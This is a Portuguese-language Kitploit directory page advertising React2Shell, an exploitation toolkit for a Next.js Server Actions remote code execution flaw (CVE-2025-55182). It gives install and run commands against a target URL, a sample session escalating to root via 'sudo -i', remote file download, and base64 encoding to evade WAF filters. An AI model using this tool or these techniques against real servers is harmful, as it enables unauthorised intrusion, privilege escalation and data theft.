Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell — Kit de Ferramentas de Exploração Avançado para Server Actions do Next.js (CVE-2025-55182) | Kitploit
Ferramentas/GitHubGitHub/xalgord/react2shell
Escalada de PrivilégiosGeração de PayloadsExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubxalgord/react2shell

React2Shell

Kit de Ferramentas de Exploração Avançado para Server Actions do Next.js (CVE-2025-55182)

516há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

⚛️ React2Shell (CVE-2025-55182)

Python License Vulnerability

Kit avançado de exploração para Server Actions do Next.js (CVE-2025-55182).

React2Shell é um wrapper de shell interativo e poderoso, projetado para explorar a vulnerabilidade React2Shell. Ele vai além do simples RCE, fornecendo histórico de comandos, capacidades de transferência de arquivos e estratégias automatizadas de escalonamento de privilégios.


🚀 Funcionalidades

  • Executável de Arquivo Único: Consolida a lógica de exploração e a interface do shell em um único script. Zero dependências externas.
  • Shell Interativo: Experiência completa de pseudo-terminal com histórico de comandos.
  • Escalonamento Automático para Root: Estratégia integrada de injeção via pipe (base64 | sudo -i) para contornar restrições do shell e escalar para root instantaneamente.
  • Operações de Arquivo:
    • .download <remote> [local]: Download de arquivos confiável e seguro para binários usando codificação base64.
    • .save: Salva a saída do comando em arquivos de evidência locais.
  • Evasão por Base64: Codifica automaticamente os payloads para contornar filtros WAF básicos e problemas de escaping do shell.

Capturas de Tela

1 2

🛠️ Instalação

root@kitploit:~
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests

💻 Uso

Uso Básico

root@kitploit:~
python3 react2shell.py -u https://target-nextjs-site.com/

Uso Avançado

Execute com detecção de estratégia de persistência de root verificada:

root@kitploit:~
python3 react2shell.py -u https://target.com/

🎮 Interface de Comandos

Uma vez dentro do shell:

Exemplo de Sessão

root@kitploit:~
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...

ubuntu@target:~$ .root
[*] Root mode ENABLED

root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)

⚠️ Aviso Legal

APENAS PARA FINS EDUCACIONAIS. Esta ferramenta destina-se exclusivamente a pesquisa de segurança e testes autorizados. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta. Não analise nem explore alvos para os quais você não tenha permissão explícita para testar.


Desenvolvida para testes de penetração éticos e operações de red team.

Baixar ferramenta
ComandoDescrição
.rootAlterna o Modo Root (envolve os comandos em sudo -i)
.download <file>Baixa um arquivo do servidor remoto
.saveSalva a saída do último comando em um arquivo
.exitSai do shell